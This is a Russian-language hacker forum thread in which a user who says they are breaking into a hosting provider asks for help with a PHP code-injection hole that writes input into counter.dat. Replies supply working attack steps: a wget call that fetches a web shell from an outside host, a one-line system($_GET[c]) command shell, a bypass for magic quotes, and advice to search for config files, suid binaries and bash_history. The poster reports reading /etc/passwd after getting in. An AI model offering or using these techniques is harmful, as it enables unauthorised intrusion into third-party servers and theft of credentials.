Пшп инъекция
 

Имею 3 файла, admin.php, counter.dat, gor_news.php.

Админ пшп выглядит просто - 1 мемо и кнопка. То, что вводиться в мемо пишится в counter.dat. При заходе в gor_news.php загружаеться этот самый коунтер.дат. В админ.пшп можно вставлять пшп код, но код типа

<?php system('ls') ?>

в канутер.дат уже записываеться, как

<?php system(\'ls\') ?>

При вводе кода без кавычек получаю листинг файлов. Код типа

<?php system($cmd) ?>

выдает Warning: system() [function.system]: Cannot execute a blank command in /var/apache2/htdocs/rus/home/counter.dat on line 1

Думаю, проблема вам понятна) Как её можно обойти, и если обойти нельзя, можно ли прямым вводом команд получать листинг предыдущей папки? Выручайте, провайдера взламываю =)

хз чё посоветовать
попробуй wget'ом шелл залить
<? system(wget http://medved.ru/preved.php /var/apache2/htdocs/rus/home/preved.php) ?>

На вгет получил

Parse error: syntax error, unexpected T_STRING in /var/apache2/htdocs/rus/home/counter.dat on line 1
=)
Пробовал так:
<?php system(&#39 ls &#39); ?>

Глупо, и не получилось =)

Напомните плз команды сервера, ls, cd и т.д., просмотр файла и всякое такое, давно не работал забыл уже ))

Точно незнаю, но помойму эта хрень называется "magic quotes" и как то отключается на сервере

мдя..
<? system($_GET[c]); ?>
потом командуй
script.php?c=id

\x27 = '

Тош))
Так правильнее будет -->>

Так, спасибо тоха, я делал немного подругому) c как переменную объявлял и пшп тупил =) Есть доступ. Какие файлы в ../../../../../ могут пригодиться? =) etc\passwd слил.

Почти в любом шелле есть поиск всех *conf, suid программ и др...загрузи шелл командой wget http://yoursite/shell.php(шеллы тут ). Также можно посмотреть bash_history в домашних каталогах /home/*(они не объязательно могут быть там).

просто командуй:
и так далее...